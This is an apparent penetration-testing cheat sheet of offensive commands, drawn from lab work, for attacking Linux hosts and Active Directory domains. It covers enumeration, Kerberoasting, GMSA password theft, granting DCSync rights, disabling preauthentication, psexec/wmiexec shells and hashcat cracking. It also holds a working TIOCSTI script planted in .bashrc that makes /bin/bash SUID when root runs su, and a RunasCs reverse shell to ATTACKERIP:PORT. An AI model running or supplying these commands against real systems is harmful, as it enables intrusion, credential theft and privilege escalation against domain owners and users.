# Commands Only Summary ## 🐧 Find ### Find all SUID binaries ```bash find / -perm -u=s -type f 2>/dev/null ``` ### All readable files ```bash find / -type f -readable ! -path "/proc/*" ! -path "/dev/*" ! -path "/run/*" ! -path "/sys/*" 2>/dev/null ``` ### All files from user ```bash find / -user 'USERNAME' ! -path "/proc/*" ! -path "/dev/*" ! -path "/run/*" ! -path "/sys/*" 2>/dev/null ``` *** ## Active Directory ### 🪟 SharpView (C# Port of PowerView) > AD Enumeration tool. C# port of [#powerview-now-deprecated](#powerview-now-deprecated "mention"). Same commands #### Get help about a command ```powershell .\SharpView.exe Get-DomainUser -Help ``` #### Enumerate information about a specific user ```powershell .\SharpView.exe Get-DomainUser -Identity ``` *** ### 🪟 PowerView (Now deprecated) > AD Enumeration Tools #### Import ```powershell Import-Module ./PowerView ``` #### Information for specific User or All users ```powershell Get-DomainUser -Identity -Domain | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol ``` #### Group specific info ```powershell Get-DomainGroupMember -Identity "Domain Admins" -Recurse ```

Explaination

`-Recurse` switch tells PowerView that if it finds any groups that are part of the target group (nested group membership) to list out the members of those groups.

#### Enumerate domain trust mappings ```powershell Get-DomainTrustMapping ``` #### Test for local admin access on either the current machine or a remote one ```powershell Test-AdminAccess -ComputerName ACADEMY-EA-MS01 ``` #### Check Kerberoasting attack possibility ```powershell Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName ``` *** ### 🪟 BloodHound #### Collect data ```batch .\SharpHound.exe -c All --zipfilename ```

Explaination

SharpHound.exe collector, needs to be ran from a domain joined PC. `-c`: (Default: Default) Collection Methods: Container, Group, LocalGroup, GPOLocalGroup, Session, LoggedOn, ObjectProps, ACL, ComputerOnly, Trusts, Default, RDP, DCOM, DCOnly `--zipfilename`: Filename for the zip

*** ### 🪟 \[Built-in] ActiveDirectory PowerShell Module > AD Enumeration tools #### **Discover Modules** ```powershell Get-Module ``` #### **Load ActiveDirectory Module** ```powershell Import-Module ActiveDirectory ``` #### **Get Domain Info** ```powershell Get-ADDomain ```

Explaination

This will print out helpful information like the domain SID, domain functional level, any child domains, and more

#### List accounts that may be susceptible to a Kerberoasting attack ```powershell Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName ``` #### Verify domain trust relationships ```powershell Get-ADTrust -Filter * ```

Explaination

This cmdlet will print out any trust relationships the domain has. We can determine if they are trusts within our forest or with domains in other forests, the type of trust, the direction of the trust, and the name of the domain the relationship is with.

#### **Group Enumeration** ```powershell Get-ADGroup -Filter * | select name ``` #### Group Information ```powershell Get-ADGroup -Identity "Backup Operators" ``` #### **Group Membership Listing** ```powershell Get-ADGroupMember -Identity "Backup Operators" ``` #### If part of GMSA\_MANAGERS Group, Set yourself as someone who can read the password ```powershell Set-ADServiceAccount -Identity "target$" -PrincipalsAllowedToRetrieveManagedPassword "yourUser" ``` *** ### 🪟 Snaffler > [Snaffler](https://github.com/SnaffCon/Snaffler) is a tool that can help us acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories. Once that is done, it iterates through any directories readable by our user and hunts for files that could serve to better our position within the assessment. Snaffler requires that it be run from a domain-joined host or in a domain-user context. ```powershell Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data ```

Explaination

`-s` tells it to print results to the console. `-d` specifies the domain to search within. `-o` tells Snaffler to write results to a logfile. `-v` option is the verbosity level.

*** ### 🐧 CrackMapExec (deprecated) | NetExec (updated) > A swiss army knife for pentesting networks #### Help for specific protocol ```bash crackmapexec smb -h ``` #### **Domain User Enumeration** ```bash sudo crackmapexec smb -u -p --users ```

Explaination

`-u Username` The user whose credentials we will use to authenticate `-p Password` User's password `Target (IP or FQDN)` Target host to enumerate (in our case, the Domain Controller) `--users` Specifies to enumerate Domain Users `--groups` Specifies to enumerate domain groups `--loggedon-users` Attempts to enumerate what users are logged on to a target, if any

#### **Domain Group Enumeration** ```bash sudo crackmapexec smb -u -p --groups ``` #### **Logged On Users** ```bash sudo crackmapexec smb -u -p --loggedon-users ``` #### **Share Searching** ```bash sudo crackmapexec smb -u -p --shares ``` #### Dig Through Share ```bash sudo crackmapexec smb -u -p -M spider_plus --share '' ``` {% hint style="info" %} When completed, CME writes the results to a JSON file located at `/tmp/cme_spider_plus/` {% endhint %} #### Password Policy ```bash sudo crackmapexec smb --pass-pol -u -p ``` {% hint style="info" %} Use empty username and password for null authentication {% endhint %} #### Group Policy Password misconfiguration (GPP, usually to check if read access to SYSVOL) ```bash sudo crackmapexec smb IP -u username -p password -M gpp_autologin ``` #### Enumerate users from RID (for when the --users command doesnt work) ```bash sudo crackmapexec smb IP -u 'user' -p 'pass' --rid-brute | grep 'SidTypeUser' ``` #### Get GMSA passwords ```bash sudo netexec ldap IP -u 'user' -p 'password' --gmsa ``` #### Get Group membership users ```bash sudo netexec smb DCIP -u 'USER' -p 'PASSWORD' --groups "GROUP" ``` #### Find certificate server (ADCS) ```bash sudo netexec ldap DCIP -u 'USER' -p 'PASSWORD' -M adcs ``` #### List Kerberoastable users ```bash sudo netexec ldap DCIP -u USER -p PASS --kerberoasting output.txt ``` AS\_REP version with `--asreproast` flag *** ### 🐧 SMBMap > SMBMap is great for enumerating SMB shares from a Linux attack host. It can be used to gather a listing of shares, permissions, and share contents if accessible. #### **SMBMap To Check Access** ```bash smbmap -u -p -d -H ``` #### **Recursive List Of All Directories** ```bash smbmap -u -p -d -H -R 'Department Shares' --dir-only ``` *** ### 🐧 rpcclient > Useful for enumeration with NULL sessions #### Connect to anonymous session ```bash rpcclient -U '' IP ``` #### Enumerate all users to gather the RIDs ```shell-session rpcclient $> enumdomusers ``` #### **User Enumeration By RID** ```shell-session rpcclient $> queryuser 0x457 ``` *** ### 🐧 Impacket Toolkit > Impacket is a versatile toolkit that provides us with many different ways to enumerate, interact, and exploit Windows protocols and find the information we need using Python. #### Shell on target device (PSExec) ```bash psexec.py :''@ ``` #### Stealthier Shell on target device (**wmiexec.py**) A more stealthy approach to execution on hosts than other tools, but would still likely be caught by most modern anti-virus and EDR systems. ```bash wmiexec.py :''@ > [Windapsearch](https://github.com/ropnop/windapsearch) is another handy Python script we can use to enumerate users, groups, and computers from a Windows domain by utilizing LDAP queries. #### Enumerate Domain Admins ```bash python3 windapsearch.py --dc-ip -u @ -p --da ``` #### Enumerate Priviledged Users ```bash python3 windapsearch.py --dc-ip -u @ -p -PU ``` *** ### 🐧 Bloodhound.py > Collect data for BloodHound GUI from a Linux host ```bash sudo bloodhound-python -u '' -p '' -ns -d -c all --zip ``` #### NTLM Hash instead of password (the NTLM hash needs to be preceded by the `:`). Use `-c all` or `-c dconly` ```bash bloodhound-python -d DOMAIN -u 'USER' --hashes ':NTLM_HASH' -dc DC_FQDM -ns DCIP --zip -c all ``` *** ### 🐧 ldapsearch * `-h ` * `-x` simple authentication (anonymous) * `-s` scope (`-s base namingcontexts`). Output of this goes in the `-b` flag content * `-b` base (`-b "DC=htb,DC=local"`) (Basically the searching scope) #### Get naming context (domain name) ```bash ldapsearch -h IP -x -s base namingcontexts ``` #### Get anonymous info ```bash ldapsearch -h IP -x -b "DC=TEST,DC=LOCAL" ``` #### Query for users (Object class of Person) ```bash ldapsearch -h IP -x -b "DC=TEST,DC=LOCAL" '(objectClass=Person)' ``` Usually the class can be person, organizationalPerson or user #### Query for users and only show username ```bash ldapsearch -h IP -x -b "DC=TEST,DC=LOCAL" '(objectClass=Person)' sAMAccountName ``` (you can add more things at the end, such as `sAMAccountName userPrincipalName`) {% hint style="info" %} $ at the end of a user account is a machine account {% endhint %} *** ### 🐧 Evil-winrm #### Connect with kerberos ```bash impacket-getTGT DOMAIN/'USER':'PASSWORD' -dc-ip DCIP export KRB5CCNAME=USER.ccache ``` ```bash evil-winrm -i TARGETIP -r DOMAIN -k USER.ccache ``` *** *** ### 🐧 🪟 Hashcat ```bash hashcat -m 5600 ``` #### secretsdump output ```bash cat dc_hash.txt | awk -F: '{print($1":"$4)}' ``` ```bash hashcat -m 1000 --user file wordlist ``` #### Find Hashcat mode ```bash hashcat --example-hashes | grep -B 2 ``` #### Generate password list from rules ```bash hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles.rule | sort -u ``` #### Limit length of passwords ```bash awk 'length($0) > 7' ```

Rules

#### Cracking ``` /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule ``` #### Password list gen ``` /usr/share/hashcat/rules/best64.rule ``` ``` /usr/share/hashcat/rules/toggles.rule ```

#### Hashes in user:hash format to save user info Put the hashes in a file in the `user:hash` format, for example for NTLM hashes then use the flag `--user` for automatically make hashcat discard that first column and use the rest as the hash. This allows to use `--show` to then recover the user of the cracked password from the potfile. *** ### 🐧 BloodyAD > Swiss army knife for AD privilege escalation {% embed url="" %} As other tools, to use NTLM hashes on this put them in the -p password field PRECEDED by a : #### Set yourself as owner ```bash bloodyAD --host "DCIP" -d "DOMAIN" -u "YOURACCOUNT" -p ":HASH" set owner GROUP YourAccount ``` #### Get Writable ```bash bloodyAD --host DCIP -d DOMAIN -u USER -p 'PASSWORD' get writable --detail ``` #### Add user to group (GenericAll over group) ```bash bloodyAD --host DCIP -d DOMAIN -u USER -p 'PASSWORD' add groupMember "GROUP" USER ``` #### Add DCSync rights to user ```bash bloodyAD --host DCIP -d DOMAIN -u USER -p 'PASSWORD' add dcsync "TARGETUSER" ``` #### Read GMSA password > ReadGMSAPassword privilege abuse Following command uses `-k` for Kerberos (needs `export KRB5CCNAME=` to be set) ```bash bloodyAD --host DC.FQDN.LOCAL -d "DOMAIN.LOCAL" --dc-ip DCIP -k get object 'TARGET' --attr msDS-ManagedPassword ``` #### Disable Pre Authentication > this makes the accounts vulnerable to asreproasting, requires GenericAll or other ways to control account ```bash bloodyAD --host DC.FQDN.LOCAL -d "DOMAIN.LOCAL" --dc-ip DCIP -k add uac TARGET -f DONT_REQ_PREAUTH ``` #### Enable account This is handy when an account is disabled but you control it through GenericAll or other write permissions ```bash bloodyAD --host DC.FQDN.LOCAL -d "DOMAIN.LOCAL" --dc-ip DCIP -k remove uac TARGET -f ACCOUNTDISABLE ``` *** ## 🐧 ntpdate > Useful to adjust the system clock to one of another machine. Solves problem like kerberos Clock skew too great ```bash sudo apt install ntpdate ``` ```bash sudo ntpdate ``` Disable NTP first: ```bash sudo timedatectl set-ntp off ``` Also if in a VM, check that no option to sync the time is set on your VM software. For example on VirtualBox on a Windows Host:

cd "C:\Program Files\Oracle\VirtualBox"
.\VBoxManage.exe setextradata "Kali" "VBoxInternal/Devices/VMMDev/0/Config/GetHostTimeDisabled" 1

*** ## 🐧 Sanitize/Stabilize Reverse Shell Option number 1: Use [pwncat](https://github.com/Chocapikk/pwncat-vl) Option number 2-ish: Use `rlwrap` (this doesnt FULLY stabilize it but it works decently for quick stuff) Option 3: ```bash SHELL=/bin/bash script -q /dev/null ``` `ctrl + z` to background netcat ``` stty raw -echo && fg ``` *** ## 🐧 Process monitoring without permissions {% embed url="" %} *** ## 🐧 pwning \`su\` command usage In the case you notice that an automated script or user will `su` into a user you have access to, it's possible to pwn it using `.bashrc` or any other shell script automatically read. More explaination at Write the following python script in the user home, for example `/home/user/esc.py` ```python #!/usr/bin/env python3 import fcntl import termios import os import sys import signal os.kill(os.getppid(), signal.SIGSTOP) for char in 'chmod u+s /bin/bash\n': fcntl.ioctl(0, termios.TIOCSTI, char) ``` Then run ```bash echo "python3 /home/user/esc.py" >> /home/user/.bashrc ``` The above command assumed it's a root user doing a `su` into a lowpriv user. You can then run the bash as root using ```bash bash -p ``` *** ## 🪟 Mounting smb share (auth) from command line ```batch net use K: \\IP\share /user:username password ``` list with ```batch net use ``` *** ### 🪟 Refreshing Privileges after privesc without closing and reopening > Useful in occasions when restarting the connection is more annoying than downloading a binary on the machine. Example is when assigning your own user to the administrators group ```powershell .\RunasCs.exe USER PASSWORD powershell -r ATTACKERIP:PORT ```